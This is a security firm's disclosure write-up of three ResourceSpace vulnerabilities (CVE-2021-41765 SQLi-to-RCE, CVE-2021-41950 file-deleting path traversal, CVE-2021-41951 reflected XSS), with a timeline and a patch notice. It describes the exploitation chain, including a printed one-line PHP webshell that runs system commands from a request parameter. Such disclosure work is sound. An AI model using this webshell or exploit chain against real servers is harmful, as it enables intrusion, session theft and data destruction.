A few months ago, while scanning the external attack surface of one of our clients, our autonomous pentesting product NodeZero identified an instance of an application called ResourceSpace exposed to the Internet. ResourceSpace is a digital asset management tool that enables users to organize their digital assets. We thought it was interesting that no vulnerabilities had been publicly disclosed against the product since 2015. So we decided to pull down the latest source code to take a closer look.

During our assessment of the ResourceSpace code base, we found three new vulnerabilities that could be exploited by an unauthenticated attacker. The most critical is CVE-2021-41765, a pre-auth SQL injection that an attacker can abuse to gain remote code execution (RCE) privileges on the ResourceSpace server. The other two vulnerabilities identified were CVE-2021-41950, a path traversal vulnerability that can be used to delete arbitrary files on the file system, and CVE-2021-41951, a reflected cross-site scripting (XSS) vulnerability. All three vulnerabilities were promptly patched by the vendor, Montala Limited.

CVE-2021-41765: Unauthenticated SQLi to RCE Chain

ResourceSpace is an older-generation PHP application in which many of the core functions and libraries used for input sanitization were built from scratch. SQL queries are built using string concatenation, and to prevent SQL injection, certain functions like escape_check and getvalescaped are used extensively throughout the code base to sanitize input variables. It requires discipline on the part of developers to consistently apply these sanitization functions.

ResourceSpace 9.5 was released in March 2021, and one of the new features announced as part of that release was “external upload shares.” This feature makes it possible for users without ResourceSpace accounts to upload content to ResourceSpace. To implement this feature, changes were made to the authentication and authorization logic. Those changes inadvertently introduced this vulnerability, specifically we found one instance where an input parameter was not getting sanitized. This is parameter k in the file pages/edit_fields/9_ajax/add_keyword.php:

Parameter k represents an authorization key for an external share, and its value is passed to the check_access_key_collection function in include/user_functions.php. Along with k, an identifier for the external share, upload_collection, is also passed into the check_access_key_collection function. Upon futher inspection, it turns out that the value of upload_collection can be passed in from a cookie called upload_share_active, and the value of 1 can always be used for this share even if no external shares have been set up by the ResourceSpace admin.

The function check_access_key_collection takes in the value of k as the $key variable and directly sends it to a SQL query, resulting in the SQL injection vulnerability.

We used sqlmap to confirm the SQL injection in a local test environment. sqlmap confirmed the injection as a boolean-based blind SQL injection.

From SQLi to Admin Access

The unauthenticated SQL injection allows an attacker to dump the entire contents of the ResourceSpace database. We found that this data includes users’ session cookies, which are stored in the session column in the user table. If the admin’s session cookie is in the database, an attacker can abuse the SQL injection to get access as an admin user.

Using sqlmap to dump all usernames, password hashes, and session cookies:

Once the session cookie was captured we were able to set the stolen session cookie in the web browser to access the ResourceSpace home page:

From Admin Access to RCE

It is very common for admin access to a web application to result in remote code execution privileges on the underlying server. We’ve described this phenomenon in several previous posts:

In the case of ResourceSpace, we found that an admin could upload a plugin containing arbitrary PHP files to the server, and then execute those PHP files.

The process for creating a plugin is described here. A plugin is a tar.gz file renamed to have the .rsp extension. We dropped in a basic webshell as part of the plugin archive file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>%

Then uploaded it to the server and accessed it to dump the contents of the /etc/passwd file:

CVE-2021-41950: Path Traversal Leading to Arbitrary File Deletion

CVE-2021-41950 is a path traversal vulnerability in pages/ajax/tiles.php. The vulnerable code is here:

The provider and variant parameters are unsanitized, and they are used to construct a directory path $tilecache. If a file already exists at this directory path, it’s deleted. An unauthenticated attacker can therefore manipulate the provider and variant parameters to arbitrarily delete files as the web server user, including application source code and the ResourceSpace configuration file config.php. Deleting config.php is particularly concerning because it contains multiple application-specific secret keys, making the installation hard to recover unless it was recently backed up.

Here’s a curl command that exploits this vulnerability to delete the config.php file:

And the resulting denial of service impact:

CVE-2021-41951: Reflected XSS

CVE-2021-41951 is a reflected XSS vulnerability via the wordpress_user parameter in the file plugins/wordpress_sso/pages/index.php. The value of this parameter is echo’d back to the caller. This appears to be test code left behind in the install.

Proving the XSS:

To exploit this vulnerability, an attacker would need to convince a ResourceSpace user to click on a crafted link. If successful, an attacker can then run arbitrary code in the victim’s browser.

Mitigation

All reported vulnerabilities were promptly fixed by the vendor, Montala Limited. In addition to fixing the above vulnerabilities, the vendor also removed the ability for administrators to upload custom plugins through the web interface.

The critical pre-auth SQL injection vulnerability affects ResourceSpace version 9.5 through 9.6.18229. If you are on any of these versions, it is highly recommended that you update to the latest version of ResourceSpace.

The latest version of ResourceSpace as of this writing is 9.7, released on October 29, 2021.

Timeline

  • Sept. 25, 2021: Vulnerabilities disclosed to vendor

  • Sept. 27, 2021: All vulnerabilities fixed

  • Nov. 9, 2021: Public disclosure

References